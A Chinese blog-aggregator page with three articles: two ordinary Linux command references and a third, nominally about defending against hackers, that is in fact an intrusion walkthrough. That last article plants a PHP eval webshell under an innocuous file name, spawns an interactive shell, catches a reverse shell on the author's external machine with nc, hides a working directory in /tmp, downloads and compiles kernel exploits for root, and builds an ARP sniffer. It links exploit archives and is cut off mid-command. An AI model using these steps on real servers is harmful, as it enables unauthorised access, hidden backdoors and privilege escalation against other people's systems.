首页 文章 精选 留言 我的

精选列表

搜索[常用命令],共667篇文章
优秀的个人博客,低调大师

非常全的Linux常用命令

最近都在和Linux打交道,感觉还不错。我觉得Linux相比windows比较麻烦的就是很多东西都要用命令来控制,当然,这也是很多人喜欢linux的原因,比较短小但却功能强大。我将我了解到的命令列举一下,仅供大家参考: 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示CPU info的信息 cat /proc/interrupts 显示中断 cat /proc/meminfo 校验内存使用 cat /proc/swaps 显示哪些swap被使用 cat /proc/version 显示内核的版本 cat /proc/net/dev 显示网络适配器及统计 cat /proc/mounts 显示已加载的文件系统 lspci -tv 罗列 PCI 设备 lsusb -tv 显示 USB 设备 date 显示系统日期 cal 2007 显示2007年的日历表 date 041217002007.00 设置日期和时间 - 月日时分年.秒 clock -w 将时间修改保存到 BIOS 关机 (系统的关机、重启以及登出 ) shutdown -h now 关闭系统(1) init 0 关闭系统(2) telinit 0 关闭系统(3) shutdown -h hours:minutes & 按预定时间关闭系统 shutdown -c 取消按预定时间关闭系统 shutdown -r now 重启(1) reboot 重启(2) logout 注销 文件和目录 cd /home 进入 '/ home' 目录' cd .. 返回上一级目录 cd ../.. 返回上两级目录 cd 进入个人的主目录 cd ~user1 进入个人的主目录 cd - 返回上次所在的目录 pwd 显示工作路径 ls 查看目录中的文件 ls -F 查看目录中的文件 ls -l 显示文件和目录的详细资料 ls -a 显示隐藏文件 ls *[0-9]* 显示包含数字的文件名和目录名 tree 显示文件和目录由根目录开始的树形结构(1) lstree 显示文件和目录由根目录开始的树形结构(2) mkdir dir1 创建一个叫做 'dir1' 的目录' mkdir dir1 dir2 同时创建两个目录 mkdir -p /tmp/dir1/dir2 创建一个目录树 rm -f file1 删除一个叫做 'file1' 的文件' rmdir dir1 删除一个叫做 'dir1' 的目录' rm -rf dir1 删除一个叫做 'dir1' 的目录并同时删除其内容 rm -rf dir1 dir2 同时删除两个目录及它们的内容 mv dir1 new_dir 重命名/移动 一个目录 cp file1 file2 复制一个文件 cp dir/* . 复制一个目录下的所有文件到当前工作目录 cp -a /tmp/dir1 . 复制一个目录到当前工作目录 cp -a dir1 dir2 复制一个目录 ln -s file1 lnk1 创建一个指向文件或目录的软链接 ln file1 lnk1 创建一个指向文件或目录的物理链接 touch -t 0712250000 file1 修改一个文件或目录的时间戳 - (YYMMDDhhmm) file file1 outputs the mime type of the file as text iconv -l 列出已知的编码 iconv -f fromEncoding -t toEncoding inputFile > outputFile creates a new from the given input file by assuming it is encoded in fromEncoding and converting it to toEncoding. find . -maxdepth 1 -name *.jpg -print -exec convert "{}" -resize 80x60 "thumbs/{}" \; batch resize files in the current directory and send them to a thumbnails directory (requires convert from Imagemagick) 文件搜索 find / -name file1 从 '/' 开始进入根文件系统搜索文件和目录 find / -user user1 搜索属于用户 'user1' 的文件和目录 find /home/user1 -name \*.bin 在目录 '/ home/user1' 中搜索带有'.bin' 结尾的文件 find /usr/bin -type f -atime +100 搜索在过去100天内未被使用过的执行文件 find /usr/bin -type f -mtime -10 搜索在10天内被创建或者修改过的文件 find / -name \*.rpm -exec chmod 755 '{}' \; 搜索以 '.rpm' 结尾的文件并定义其权限 find / -xdev -name \*.rpm 搜索以 '.rpm' 结尾的文件,忽略光驱、捷盘等可移动设备 locate \*.ps 寻找以 '.ps' 结尾的文件 - 先运行 'updatedb' 命令 whereis halt 显示一个二进制文件、源码或man的位置 which halt 显示一个二进制文件或可执行文件的完整路径 挂载一个文件系统 mount /dev/hda2 /mnt/hda2 挂载一个叫做hda2的盘 - 确定目录 '/ mnt/hda2' 已经存在 umount /dev/hda2 卸载一个叫做hda2的盘 - 先从挂载点 '/ mnt/hda2' 退出 fuser -km /mnt/hda2 当设备繁忙时强制卸载 umount -n /mnt/hda2 运行卸载操作而不写入 /etc/mtab 文件- 当文件为只读或当磁盘写满时非常有用 mount /dev/fd0 /mnt/floppy 挂载一个软盘 mount /dev/cdrom /mnt/cdrom 挂载一个cdrom或dvdrom mount /dev/hdc /mnt/cdrecorder 挂载一个cdrw或dvdrom mount /dev/hdb /mnt/cdrecorder 挂载一个cdrw或dvdrom mount -o loop file.iso /mnt/cdrom 挂载一个文件或ISO镜像文件 mount -t vfat /dev/hda5 /mnt/hda5 挂载一个Windows FAT32文件系统 mount /dev/sda1 /mnt/usbdisk 挂载一个usb 捷盘或闪存设备 mount -t smbfs -o username=user,password=pass //WinClient/share /mnt/share 挂载一个windows网络共享 磁盘空间 df -h 显示已经挂载的分区列表 ls -lSr |more 以尺寸大小排列文件和目录 du -sh dir1 估算目录 'dir1' 已经使用的磁盘空间' du -sk * | sort -rn 以容量大小为依据依次显示文件和目录的大小 rpm -q -a --qf '%10{SIZE}t%{NAME}n' | sort -k1,1n 以大小为依据依次显示已安装的rpm包所使用的空间 (fedora, redhat类系统) dpkg-query -W -f='${Installed-Size;10}t${Package}n' | sort -k1,1n 以大小为依据显示已安装的deb包所使用的空间 (ubuntu, debian类系统) 用户和群组 groupadd group_name 创建一个新用户组 groupdel group_name 删除一个用户组 groupmod -n new_group_name old_group_name 重命名一个用户组 useradd -c "Name Surname " -g admin -d /home/user1 -s /bin/bash user1 创建一个属于 "admin" 用户组的用户 useradd user1 创建一个新用户 userdel -r user1 删除一个用户 ( '-r' 排除主目录) usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1 修改用户属性 passwd 修改口令 passwd user1 修改一个用户的口令 (只允许root执行) chage -E 2005-12-31 user1 设置用户口令的失效期限 pwck 检查 '/etc/passwd' 的文件格式和语法修正以及存在的用户 grpck 检查 '/etc/passwd' 的文件格式和语法修正以及存在的群组 newgrp group_name 登陆进一个新的群组以改变新创建文件的预设群组 文件的权限 - 使用 "+" 设置权限,使用 "-" 用于取消 ls -lh 显示权限 ls /tmp | pr -T5 -W$COLUMNS 将终端划分成5栏显示 chmod ugo+rwx directory1 设置目录的所有人(u)、群组(g)以及其他人(o)以读(r )、写(w)和执行(x)的权限 chmod go-rwx directory1 删除群组(g)与其他人(o)对目录的读写执行权限 chown user1 file1 改变一个文件的所有人属性 chown -R user1 directory1 改变一个目录的所有人属性并同时改变改目录下所有文件的属性 chgrp group1 file1 改变文件的群组 chown user1:group1 file1 改变一个文件的所有人和群组属性 find / -perm -u+s 罗列一个系统中所有使用了SUID控制的文件 chmod u+s /bin/file1 设置一个二进制文件的 SUID 位 - 运行该文件的用户也被赋予和所有者同样的权限 chmod u-s /bin/file1 禁用一个二进制文件的 SUID位 chmod g+s /home/public 设置一个目录的SGID 位 - 类似SUID ,不过这是针对目录的 chmod g-s /home/public 禁用一个目录的 SGID 位 chmod o+t /home/public 设置一个文件的 STIKY 位 - 只允许合法所有人删除文件 chmod o-t /home/public 禁用一个目录的 STIKY 位 文件的特殊属性 - 使用 "+" 设置权限,使用 "-" 用于取消 chattr +a file1 只允许以追加方式读写文件 chattr +c file1 允许这个文件能被内核自动压缩/解压 chattr +d file1 在进行文件系统备份时,dump程序将忽略这个文件 chattr +i file1 设置成不可变的文件,不能被删除、修改、重命名或者链接 chattr +s file1 允许一个文件被安全地删除 chattr +S file1 一旦应用程序对这个文件执行了写操作,使系统立刻把修改的结果写到磁盘 chattr +u file1 若文件被删除,系统会允许你在以后恢复这个被删除的文件 lsattr 显示特殊的属性 打包和压缩文件 bunzip2 file1.bz2 解压一个叫做 'file1.bz2'的文件 bzip2 file1 压缩一个叫做 'file1' 的文件 gunzip file1.gz 解压一个叫做 'file1.gz'的文件 gzip file1 压缩一个叫做 'file1'的文件 gzip -9 file1 最大程度压缩 rar a file1.rar test_file 创建一个叫做 'file1.rar' 的包 rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1' rar x file1.rar 解压rar包 unrar x file1.rar 解压rar包 tar -cvf archive.tar file1 创建一个非压缩的 tarball tar -cvf archive.tar file1 file2 dir1 创建一个包含了 'file1', 'file2' 以及 'dir1'的档案文件 tar -tf archive.tar 显示一个包中的内容 tar -xvf archive.tar 释放一个包 tar -xvf archive.tar -C /tmp 将压缩包释放到 /tmp目录下 tar -cvfj archive.tar.bz2 dir1 创建一个bzip2格式的压缩包 tar -xvfj archive.tar.bz2 解压一个bzip2格式的压缩包 tar -cvfz archive.tar.gz dir1 创建一个gzip格式的压缩包 tar -xvfz archive.tar.gz 解压一个gzip格式的压缩包 zip file1.zip file1 创建一个zip格式的压缩包 zip -r file1.zip file1 file2 dir1 将几个文件和目录同时压缩成一个zip格式的压缩包 unzip file1.zip 解压一个zip格式压缩包 RPM 包 - (Fedora, Redhat及类似系统) rpm -ivh package.rpm 安装一个rpm包 rpm -ivh --nodeeps package.rpm 安装一个rpm包而忽略依赖关系警告 rpm -U package.rpm 更新一个rpm包但不改变其配置文件 rpm -F package.rpm 更新一个确定已经安装的rpm包 rpm -e package_name.rpm 删除一个rpm包 rpm -qa 显示系统中所有已经安装的rpm包 rpm -qa | grep httpd 显示所有名称中包含 "httpd" 字样的rpm包 rpm -qi package_name 获取一个已安装包的特殊信息 rpm -qg "System Environment/Daemons" 显示一个组件的rpm包 rpm -ql package_name 显示一个已经安装的rpm包提供的文件列表 rpm -qc package_name 显示一个已经安装的rpm包提供的配置文件列表 rpm -q package_name --whatrequires 显示与一个rpm包存在依赖关系的列表 rpm -q package_name --whatprovides 显示一个rpm包所占的体积 rpm -q package_name --scripts 显示在安装/删除期间所执行的脚本l rpm -q package_name --changelog 显示一个rpm包的修改历史 rpm -qf /etc/httpd/conf/httpd.conf 确认所给的文件由哪个rpm包所提供 rpm -qp package.rpm -l 显示由一个尚未安装的rpm包提供的文件列表 rpm --import /media/cdrom/RPM-GPG-KEY 导入公钥数字证书 rpm --checksig package.rpm 确认一个rpm包的完整性 rpm -qa gpg-pubkey 确认已安装的所有rpm包的完整性 rpm -V package_name 检查文件尺寸、 许可、类型、所有者、群组、MD5检查以及最后修改时间 rpm -Va 检查系统中所有已安装的rpm包- 小心使用 rpm -Vp package.rpm 确认一个rpm包还未安装 rpm2cpio package.rpm | cpio --extract --make-directories *bin* 从一个rpm包运行可执行文件 rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm 从一个rpm源码安装一个构建好的包 rpmbuild --rebuild package_name.src.rpm 从一个rpm源码构建一个 rpm 包 YUM 软件包升级器 - (Fedora, RedHat及类似系统) yum install package_name 下载并安装一个rpm包 yum localinstall package_name.rpm 将安装一个rpm包,使用你自己的软件仓库为你解决所有依赖关系 yum update package_name.rpm 更新当前系统中所有安装的rpm包 yum update package_name 更新一个rpm包 yum remove package_name 删除一个rpm包 yum list 列出当前系统中安装的所有包 yum search package_name 在rpm仓库中搜寻软件包 yum clean packages 清理rpm缓存删除下载的包 yum clean headers 删除所有头文件 yum clean all 删除所有缓存的包和头文件 DEB 包 (Debian, Ubuntu 以及类似系统) dpkg -i package.deb 安装/更新一个 deb 包 dpkg -r package_name 从系统删除一个 deb 包 dpkg -l 显示系统中所有已经安装的 deb 包 dpkg -l | grep httpd 显示所有名称中包含 "httpd" 字样的deb包 dpkg -s package_name 获得已经安装在系统中一个特殊包的信息 dpkg -L package_name 显示系统中已经安装的一个deb包所提供的文件列表 dpkg --contents package.deb 显示尚未安装的一个包所提供的文件列表 dpkg -S /bin/ping 确认所给的文件由哪个deb包提供 APT 软件工具 (Debian, Ubuntu 以及类似系统) apt-get install package_name 安装/更新一个 deb 包 apt-cdrom install package_name 从光盘安装/更新一个 deb 包 apt-get update 升级列表中的软件包 apt-get upgrade 升级所有已安装的软件 apt-get remove package_name 从系统删除一个deb包 apt-get check 确认依赖的软件仓库正确 apt-get clean 从下载的软件包中清理缓存 apt-cache search searched-package 返回包含所要搜索字符串的软件包名称 查看文件内容 cat file1 从第一个字节开始正向查看文件的内容 tac file1 从最后一行开始反向查看一个文件的内容 more file1 查看一个长文件的内容 less file1 类似于 'more' 命令,但是它允许在文件中和正向操作一样的反向操作 head -2 file1 查看一个文件的前两行 tail -2 file1 查看一个文件的最后两行 tail -f /var/log/messages 实时查看被添加到一个文件中的内容 文本处理 cat file1 file2 ... | command <> file1_in.txt_or_file1_out.txt general syntax for text manipulation using PIPE, STDIN and STDOUT cat file1 | command( sed, grep, awk, grep, etc...) > result.txt 合并一个文件的详细说明文本,并将简介写入一个新文件中 cat file1 | command( sed, grep, awk, grep, etc...) >> result.txt 合并一个文件的详细说明文本,并将简介写入一个已有的文件中 grep Aug /var/log/messages 在文件 '/var/log/messages'中查找关键词"Aug" grep ^Aug /var/log/messages 在文件 '/var/log/messages'中查找以"Aug"开始的词汇 grep [0-9] /var/log/messages 选择 '/var/log/messages' 文件中所有包含数字的行 grep Aug -R /var/log/* 在目录 '/var/log' 及随后的目录中搜索字符串"Aug" sed 's/stringa1/stringa2/g' example.txt 将example.txt文件中的 "string1" 替换成 "string2" sed '/^$/d' example.txt 从example.txt文件中删除所有空白行 sed '/ *#/d; /^$/d' example.txt 从example.txt文件中删除所有注释和空白行 echo 'esempio' | tr '[:lower:]' '[:upper:]' 合并上下单元格内容 sed -e '1d' result.txt 从文件example.txt 中排除第一行 sed -n '/stringa1/p' 查看只包含词汇 "string1"的行 sed -e 's/ *$//' example.txt 删除每一行最后的空白字符 sed -e 's/stringa1//g' example.txt 从文档中只删除词汇 "string1" 并保留剩余全部 sed -n '1,5p;5q' example.txt 查看从第一行到第5行内容 sed -n '5p;5q' example.txt 查看第5行 sed -e 's/00*/0/g' example.txt 用单个零替换多个零 cat -n file1 标示文件的行数 cat example.txt | awk 'NR%2==1' 删除example.txt文件中的所有偶数行 echo a b c | awk '{print $1}' 查看一行第一栏 echo a b c | awk '{print $1,$3}' 查看一行的第一和第三栏 paste file1 file2 合并两个文件或两栏的内容 paste -d '+' file1 file2 合并两个文件或两栏的内容,中间用"+"区分 sort file1 file2 排序两个文件的内容 sort file1 file2 | uniq 取出两个文件的并集(重复的行只保留一份) sort file1 file2 | uniq -u 删除交集,留下其他的行 sort file1 file2 | uniq -d 取出两个文件的交集(只留下同时存在于两个文件中的文件) comm -1 file1 file2 比较两个文件的内容只删除 'file1' 所包含的内容 comm -2 file1 file2 比较两个文件的内容只删除 'file2' 所包含的内容 comm -3 file1 file2 比较两个文件的内容只删除两个文件共有的部分 字符设置和文件格式转换 dos2unix filedos.txt fileunix.txt 将一个文本文件的格式从MSDOS转换成UNIX unix2dos fileunix.txt filedos.txt 将一个文本文件的格式从UNIX转换成MSDOS recode ..HTML < page.txt > page.html 将一个文本文件转换成html recode -l | more 显示所有允许的转换格式 文件系统分析 badblocks -v /dev/hda1 检查磁盘hda1上的坏磁块 fsck /dev/hda1 修复/检查hda1磁盘上linux文件系统的完整性 fsck.ext2 /dev/hda1 修复/检查hda1磁盘上ext2文件系统的完整性 e2fsck /dev/hda1 修复/检查hda1磁盘上ext2文件系统的完整性 e2fsck -j /dev/hda1 修复/检查hda1磁盘上ext3文件系统的完整性 fsck.ext3 /dev/hda1 修复/检查hda1磁盘上ext3文件系统的完整性 fsck.vfat /dev/hda1 修复/检查hda1磁盘上fat文件系统的完整性 fsck.msdos /dev/hda1 修复/检查hda1磁盘上dos文件系统的完整性 dosfsck /dev/hda1 修复/检查hda1磁盘上dos文件系统的完整性 初始化一个文件系统 mkfs /dev/hda1 在hda1分区创建一个文件系统 mke2fs /dev/hda1 在hda1分区创建一个linux ext2的文件系统 mke2fs -j /dev/hda1 在hda1分区创建一个linux ext3(日志型)的文件系统 mkfs -t vfat 32 -F /dev/hda1 创建一个 FAT32 文件系统 fdformat -n /dev/fd0 格式化一个软盘 mkswap /dev/hda3 创建一个swap文件系统 SWAP文件系统 mkswap /dev/hda3 创建一个swap文件系统 swapon /dev/hda3 启用一个新的swap文件系统 swapon /dev/hda2 /dev/hdb3 启用两个swap分区 备份 dump -0aj -f /tmp/home0.bak /home 制作一个 '/home' 目录的完整备份 dump -1aj -f /tmp/home0.bak /home 制作一个 '/home' 目录的交互式备份 restore -if /tmp/home0.bak 还原一个交互式备份 rsync -rogpav --delete /home /tmp 同步两边的目录 rsync -rogpav -e ssh --delete /home ip_address:/tmp 通过SSH通道rsync rsync -az -e ssh --delete ip_addr:/home/public /home/local 通过ssh和压缩将一个远程目录同步到本地目录 rsync -az -e ssh --delete /home/local ip_addr:/home/public 通过ssh和压缩将本地目录同步到远程目录 dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr 'dd of=hda.gz' 通过ssh在远程主机上执行一次备份本地磁盘的操作 dd if=/dev/sda of=/tmp/file1 备份磁盘内容到一个文件 tar -Puf backup.tar /home/user 执行一次对 '/home/user' 目录的交互式备份操作 ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr 'cd /home/share/ && tar x -p' 通过ssh在远程目录中复制一个目录内容 ( tar c /home ) | ssh -C user@ip_addr 'cd /home/backup-home && tar x -p' 通过ssh在远程目录中复制一个本地目录 tar cf - . | (cd /tmp/backup ; tar xf - ) 本地将一个目录复制到另一个地方,保留原有权限及链接 find /home/user1 -name '*.txt' | xargs cp -av --target-directory=/home/backup/ --parents 从一个目录查找并复制所有以 '.txt' 结尾的文件到另一个目录 find /var/log -name '*.log' | tar cv --files-from=- | bzip2 > log.tar.bz2 查找所有以 '.log' 结尾的文件并做成一个bzip包 dd if=/dev/hda of=/dev/fd0 bs=512 count=1 做一个将 MBR (Master Boot Record)内容复制到软盘的动作 dd if=/dev/fd0 of=/dev/hda bs=512 count=1 从已经保存到软盘的备份中恢复MBR内容 光盘 cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force 清空一个可复写的光盘内容 mkisofs /dev/cdrom > cd.iso 在磁盘上创建一个光盘的iso镜像文件 mkisofs /dev/cdrom | gzip > cd_iso.gz 在磁盘上创建一个压缩了的光盘iso镜像文件 mkisofs -J -allow-leading-dots -R -V "Label CD" -iso-level 4 -o ./cd.iso data_cd 创建一个目录的iso镜像文件 cdrecord -v dev=/dev/cdrom cd.iso 刻录一个ISO镜像文件 gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom - 刻录一个压缩了的ISO镜像文件 mount -o loop cd.iso /mnt/iso 挂载一个ISO镜像文件 cd-paranoia -B 从一个CD光盘转录音轨到 wav 文件中 cd-paranoia -- "-3" 从一个CD光盘转录音轨到 wav 文件中(参数-3) cdrecord --scanbus 扫描总线以识别scsi通道 dd if=/dev/hdc | md5sum 校验一个设备的md5sum编码,例如一张 CD 网络 - (以太网和WIFI无线) ifconfig eth0 显示一个以太网卡的配置 ifup eth0 启用一个 'eth0' 网络设备 ifdown eth0 禁用一个 'eth0' 网络设备 ifconfig eth0 192.168.1.1 netmask 255.255.255.0 控制IP地址 ifconfig eth0 promisc 设置 'eth0' 成混杂模式以嗅探数据包 (sniffing) dhclient eth0 以dhcp模式启用 'eth0' route -n show routing table route add -net 0/0 gw IP_Gateway configura default gateway route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1 configure static route to reach network '192.168.0.0/16' route del 0/0 gw IP_gateway remove static route echo "1" > /proc/sys/net/ipv4/ip_forward activate ip routing hostname show hostname of system host www.example.com lookup hostname to resolve name to ip address and viceversa(1) nslookup www.example.com lookup hostname to resolve name to ip address and viceversa(2) ip link show show link status of all interfaces mii-tool eth0 show link status of 'eth0' ethtool eth0 show statistics of network card 'eth0' netstat -tup show all active network connections and their PID netstat -tupl show all network services listening on the system and their PID tcpdump tcp port 80 show all HTTP traffic iwlist scan show wireless networks iwconfig eth1 show configuration of a wireless network card hostname show hostname host www.example.com lookup hostname to resolve name to ip address and viceversa nslookup www.example.com lookup hostname to resolve name to ip address and viceversa whois www.example.com lookup on Whois database JPS工具 jps(Java Virtual Machine Process Status Tool)是JDK 1.5提供的一个显示当前所有java进程pid的命令,简单实用,非常适合在linux/unix平台上简单察看当前java进程的一些简单情况。 我想很多人都是用过unix系统里的ps命令,这个命令主要是用来显示当前系统的进程情况,有哪些进程,及其 id。 jps 也是一样,它的作用是显示当前系统的java进程情况,及其id号。我们可以通过它来查看我们到底启动了几个java进程(因为每一个java程序都会独占一个java虚拟机实例),和他们的进程号(为下面几个程序做准备),并可通过opt来查看这些进程的详细启动参数。 使用方法:在当前命令行下打 jps(需要JAVA_HOME,没有的话,到改程序的目录下打) 。 jps存放在JAVA_HOME/bin/jps,使用时为了方便请将JAVA_HOME/bin/加入到Path. $>jps 23991 Jps 23789 BossMain 23651 Resin 比较常用的参数: -q 只显示pid,不显示class名称,jar文件名和传递给main 方法的参数 $>jps -q 28680 23789 23651 -m 输出传递给main 方法的参数,在嵌入式jvm上可能是null $>jps -m 28715 Jps -m 23789 BossMain 23651 Resin -socketwait 32768 -stdout /data/aoxj/resin/log/stdout.log -stderr /data/aoxj/resin/log/stderr.log -l 输出应用程序main class的完整package名 或者 应用程序的jar文件完整路径名 $>jps -l 28729 sun.tools.jps.Jps 23789 com.asiainfo.aimc.bossbi.BossMain 23651 com.caucho.server.resin.Resin -v 输出传递给JVM的参数 $>jps -v 23789 BossMain 28802 Jps -Denv.class.path=/data/aoxj/bossbi/twsecurity/java/trustwork140.jar:/data/aoxj/bossbi/twsecurity/java/:/data/aoxj/bossbi/twsecurity/java/twcmcc.jar:/data/aoxj/jdk15/lib/rt.jar:/data/aoxj/jd k15/lib/tools.jar -Dapplication.home=/data/aoxj/jdk15 -Xms8m 23651 Resin -Xss1m -Dresin.home=/data/aoxj/resin -Dserver.root=/data/aoxj/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl - Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl sudo jps看到的进程数量最全 jps 192.168.0.77 列出远程服务器192.168.0.77机器所有的jvm实例,采用rmi协议,默认连接端口为1099 (前提是远程服务器提供jstatd服务) 注:jps命令有个地方很不好,似乎只能显示当前用户的java进程,要显示其他用户的还是只能用unix/linux的ps命令。 详细情况请参考sun官方文档。 http://java.sun.com/j2se/1.7.0/docs/tooldocs/share/jps.html GO TOP INDEX ^ Microsoft Windows networks (SAMBA) nbtscan ip_addr netbios name resolution nmblookup -A ip_addr netbios name resolution smbclient -L ip_addr/hostname show remote shares of a windows host smbget -Rr smb://ip_addr/share like wget can download files from a host windows via smb mount -t smbfs -o username=user,password=pass //WinClient/share /mnt/share mount a windows network share
2018-07-09
优秀的个人博客,低调大师

Linux常用命令—权限管理命令

1、chmod[changethepermissionsmodeofafile]:/bin/chmod 语法: chmod[{ugo}{+-=}{rwx}][文件或目录名]//直观 e.g. chmodu+wxfilename 所有者 chmodg=rwxfilename 所属组 chmodo-xfilename 其他人 eg: chmod g+w,o-r filename [root@localhosttmp]#ls-lstudy.list -rw-r--r--.1rootroot0May918:56study.list [root@localhosttmp]#chmodu+xstudy.list [root@localhosttmp]#ls-lstudy.list -rwxr--r--.1rootroot0May918:56study.list [root@localhosttmp]# 或者: chmod[mode=421][文件或目录] //推荐 权限所对数字: r-4 w-2 x-1 e.g. rwxr-xr-- 754 rw-r-x--x 651 rwxr-x-w-752 chmod777 filename //设定文件为所有用户具有全部权限 [root@localhosttmp]#chmod777study.list [root@localhosttmp]#ls-lstudy.list -rwxrwxrwx.1rootroot0May918:56study.list [root@localhosttmp]# -R 递归修改 chmod -R 777 testdir // 修改目录testdir及其目录下文件为所有文件具有全部权限 附:useradd 名字 //添加用户 su username //可切换用户 退出: exit 总结: 2、chown[changefileownership] /bin/chown chown[用户][文件名或目录名] //改变文件所有者,root才能做,前提是用户存在 e.g. chownnobodyfile1 #改变文件file1的所有者为nobody,nobody为系统默认存在的用户。 附-添加用户: 1)useraddafang 2)passwd afang #为其设置密码 3、chgrp[changefilegroupownership] /bin/chgrp chgrp[用户组][文件或目录] #改变文件或目录的所属组 #必须为系统已经存在的组 E.g. chgrpadmfile1 #改变文件file1的所属组为adm #其中adm是系统中已经有的一个组。 附:groupadd 组名 //添加组 4、umask /bin/umask //显示、设置文件的缺省权限 umask[-S] //-S以rwx形式显示新建文件或目录缺省权限,更直观一些 e.g. umask //查看默认权限,比较传统 #显示0022:0-特殊权限位,022-用户权限位--- -w- -w- 那么缺省文件或目录权限怎么计算: 首先在linux在默认创建的文件没有可执行权限,即没有x 计算: 777-022 = 755 //这是创建目录的默认权限 666-022 = 644 //是创建文件的默认权限,都没有x,文件权限都比目录权限少一个X 附1:很多UNIX系统中并没有-S这个选项,所以只能按照上面计算! 附2-Linux权限规则:默认创建的文件,不能授予可执行权限(X)!好处是屏蔽了很多攻击与病毒。 附3-改变缺省权限值:umask[掩码值]注意umask的值可以更改,但不推荐
2018-05-12
优秀的个人博客,低调大师

linux操作系统常用命令

linux操作系统 特点: 系统中没有盘符. 只有文件. 目录结构: /etc 存储系统配置文件.(网络配置 防火墙 ....) /home 普通用户的家. /zhouyan /yan /root 超级管理员的家 /usr 共享文件 / 系统的根目录 常见目录 磁盘命令 ls 查看目录下的文件或文件夹 -a 查看所有文件(包含隐藏文件) -l 显示文件或目录的明细 组合: ls -al 查询所有文件名称 ll -a 查询所有文件名称 cd 切换目录 cd / 系统的根/ cd 空格 默认切换到当前用户的根(回家) ★★/root cd ~ 当前用户的根(回家)/root cd .. 上一级目录 ★★ cd - 返回上一次访问目录 pwd 显示当前工作目录 mkdir 创建目录的 ★mkdir -pv -p 在父目录不存在的情况下,先创建父目录再创建子目录 -v 显示执行的明细 touch 文件名 创建文件 --------------------- 文件操作 cp 复制文件或目录 -r 循环递归--针对复制目录 ★ -b 复制的目录已存在某个文件或目录.先备份原来的文件或目录,在复制(了解) 开发中: 发布项目或资源,先备份再覆盖. mv 移动或重命名 -f 强制覆盖 rm 删除文件或目录 -f 强制删除 -r 循环递归--如果目录存在子目录或文件.先删除子目录或文件,再删除父目录 组合: rm -rf 强转循环删除 ★★★ find 查询 查询指定目录下的文件或文件夹 -name 根据文件名或目录名称查询 find 指定目录 -name '文件或目录名称' --------------------- 文档编辑 ★★★ vi或vim 编辑文件 vim 修改文件时,会将一些关键字高亮显示. 格式: vim 文件名 基本模式: 一般模式: vim 文件名,默认进入一般模式 复制、删除。。。 插入模式 按下"a/i/o",进入插入模式 修改文件内容 a 当前光标后插入 i 当前光标插入 o 下一行插入 底行模式 按下esc,返回到一般模式. 按下":",切换到底行模式 ":wq" 保存并退出 ":q!" 不保存退出 yy 复制当行 -- 一般模式 p 粘贴 -- 一般模式 dd 删除光标所在行 -- 一般模式 x 删除光标所在字符--只删除一个 -- 一般模式 grep命令:grep -i haha a/1.txt 用于过滤/查询特殊字符 grep -i 关键字 文件路径 -i 忽略大小写查询 管道 | 格式: 命令1|命令2: 命令1输出的内容作为命令2输入的内容 组合: ps -ef|grep 进程名称 --------------------- 文件浏览 ★★★ cat 查询文件所有内容. 适用于: 查询配置文件 more 分页查询(了解) less 分页查询 ★★★ -m 显示百分比 -N 显示行号 / 向下搜索 ? 向上搜索 q 退出 tail 查看文件末尾的内容 ★★★ -f 循环查询 组合: tail -f 日志文件路径 --------------------- 系统命令 ps 查看进程 组合: ps -ef 查询所有进程的明细 ps -ef | grep 进程名 查询指定的进程 kill 杀死进程 -9 强制杀死进程 组合: kill -9 进程号(pid) ifconfig 显示网络配置信息 ping 测试与目标主机的连通性 --------------------- 压缩和解压缩tar ★★★ tar -c 压缩 -x 解压 -v 显示执行明细 -z 是否使用gzip压缩 -f 指定压缩文件的名称 组合: tar -zcvf 压缩文件名 需要被压缩的文件或目录 压缩` tar -zxvf 需要解压的文件名 默认解压到当前压缩包所在目录 tar -zxvf 需要解压的文件名 -C 目录 解压指定目录下 文件权限chmod 组合: chmod 777 文件或目录 给所有的用户都添加读、写、执行的权限 ★ chmod 775 文件或目录 当前和所属组用户都添加读、写、执行的权限,其他组添加读、执行的权限★ chmod 000 文件或目录 取消文件或目录所有权限(很少有) 网络配置: 方式1. 修改配置文件 cat /etc/sysconfig/network-scripts/ifcfg-eth0 重启网络服务: service network restart
2018-04-23
优秀的个人博客,低调大师

Linux入侵常用命令防黑客

写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php [jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php 1、linux的想着先跨站 shell浏览目标站不行,命令行下输入: ls -la /www.users/ 2、溢出提权 # python –c ‘impotr pty;pty.spawn(“/bin/sh”); 来得到交互的Shell,一般的系统都默认安装python 输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid=529(zeicom)还不是root权限, 输入uname –r 返回:2.6.18-164.11.1.el5PAE Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出 找对应的exp, 这里地址整理很齐全可以这里下 http://tools.90sec.org/ http://sebug.net/paper/linux_exp/ http://x73.cc/bitch/exp/ http://www.exploit-db.com/search/ 命令输入pwd,这个命令是显示当前目录, 先看能不能编译 gcc -help 当前目录就是shell的目录,我在shell上传2.c 反弹shell 到外网自己机器的12345端口 上外网服务器 本地监听 nc -lvvp 12345 一般都能得到一个apache交互的shell 有时候又不行 这时候 # python -c 'impotr pty;pty.spawn("/bin/sh");' cd /tmp 进入tmp目录 mkdir Papers 创建一个Papers的目录 Papers不显眼 cd Papers 进入 Papers目录 pwd 查看当前目录 然后命令输入 wget 下载exp gcc –o 2 2.c //把2.c编译成可执行文件 g++ keio.cc -o keio chmod +x 2 //给2有执行权限 ./2 //执行2, 溢出 gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet 确定arpsniffer.c需要先装pcap和 libnet。 rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm wget 